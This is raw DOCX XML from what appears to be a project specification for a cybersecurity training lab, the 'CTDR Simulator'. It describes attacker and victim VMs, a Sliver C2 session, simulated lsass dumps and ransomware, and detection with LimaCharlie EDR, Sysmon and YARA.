        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Detection and Response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LimaCharlie EDR:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Monitors logs, detects threats, and triggers pre-defined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>response rules on the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>D&amp;R Rules:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> De</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fine automated responses to specific threats.</w:t>
      </w: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Attack Simulation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sliver C2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Establishes a command and control channel between the attacker and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>victim machines.</w:t>
      </w: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Simulated Attacks:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="369"/>
          <w:tab w:val="clear" w:pos="789"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="789" w:leftChars="0" w:hanging="369" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Memory dump of lsass.exe from the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="369"/>
          <w:tab w:val="clear" w:pos="789"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="789" w:leftChars="0" w:hanging="369" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ransomware attack attempt.</w:t>
      </w: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YARA Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated scanning: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Identifies malware based on predefined signatures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>D&amp;R rules:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Trigger actions upon malware detection.</w:t>
      </w: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Modular Approach:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Organization:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gather necessary tools and software.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Log Monitoring:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Detect anomalies and potential threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Block detected threats using D&amp;R rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="397"/>
          <w:tab w:val="clear" w:pos="817"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="817" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Practice threat detection and response in a controlled environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="397"/>
          <w:tab w:val="clear" w:pos="817"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="817" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Understand the job roles of working cybersecurity analyst professionals.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="397"/>
          <w:tab w:val="clear" w:pos="817"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="817" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">hands-on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>experience with various cybersecurity tools and techniques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="397"/>
          <w:tab w:val="clear" w:pos="817"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="817" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Test and refine security measures to enhance overall security posture.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3.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2 Overall Description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Product Perspective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offers a simulated environment for cybersecurity analysts to practice real-world threat detection and response scenarios. This environment allows users to learn about different cybersecurity tools and techniques in a controlled setting.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CTDR Simulator offers a controlled and user-friendly environment for individuals interested in cybersecurity to hone their skills in real-world threat detection and response scenarios. This simulated environment enables users to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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Practice essential security skills in a safe and controlled setting, minimizing potential risks associated with real-world cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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Gain hands-on experience with various cybersecurity tools and techniques used by security professionals in detecting, analyzing, and responding to cyberattacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>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Develop critical thinking and problem-solving skills by encountering and mitigating diverse simulated cyber threats.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Product Functions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Virtual Machine Setup</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Creation and configuration of virtual machines representing attacker and victim systems.</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stimulation of the attack is performed through a Ubuntu Linux machine with SSH Client is setup. The victim machine is Windows 11 virtual machine which is compromised. The network configuration of the machines are configured as static, so not to interfere any networking issues and to ensure smooth and seamless working experience.</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Attack Simulation</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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enabling simulation of attacker actions through Sliver C2 for establishing a command and control session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> The C2 payload can implanted in the victim machine by any means of social engineering attack, but for the simplicity of the project temporary python server has been used.</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Threat Detection and Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>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Integration with LimaCharlie EDR to collect system logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>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Definition of user-defined D&amp;R rules for specific threat scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>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Detection of threats (e.g., lsass.exe memory dumps, ransomware activities) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="39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T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>riggering corresponding D&amp;R responses.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Automated YARA Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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rPr>
        <w:t>Adding YARA signatures for known malware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> i.e. for sliver.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>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Automated scanning of newly downloaded files and launched processes based on defined YARA rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>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Generating alerts upon detection of potential malware based on YARA signatures.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User Classes and Characteristics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target users are individuals interested in learning about cybersecurity, including:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Cybersecurity students</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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professionals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Security analysts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Users are expected to have a basic understanding of cybersecurity concepts and familiarity with operating systems.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Operating Environment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is designed to operate on a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ny</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> personal computer with a modern operating system (e.g., Windows 10 or later, macOS, Linux) and sufficient resources to run virtual machines and supporting software.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Hardware Requirements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is recommended to run on a personal computer with a minimum of 8 GB of RAM. However, for optimal performance, 16 GB or more is ideal.</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disk space requirement is approximately 80 to 100 GB.</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867"/>
        <w:gridCol w:w="2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ind w:firstLine="140" w:firstLineChars="50"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2F528D"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2F528D"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>System Requirement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2"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pP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IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2F528D"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Minimum</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2"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pP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lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2F528D"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Preferred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28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jc w:val="both"/>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RAM</w:t>
            </w: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8GB</w:t>
            </w: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16GB or more</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2"/>
                <w:szCs w:val="22"/>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28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jc w:val="both"/>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Disk Space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2"/>
                <w:szCs w:val="22"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pP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~64-80GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286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0"/>
                <w:szCs w:val="20"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-I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6"/>
                <w:szCs w:val="26"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>~80-100GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Design and Implementation Constraints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is limited to the use of specified tools: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>VirtualBox:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Creates and manages virtual machines, allowing you to simulate attacker and victim systems within a controlled environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sliver C2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Establishes a command and control (C2) communication channel between the attacker and victim machines, enabling the simulation of attacker actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sysmon:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Provides advanced system monitoring capabilities, capturing detailed information about system activities on the victim machine, which can be helpful for threat detection and analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
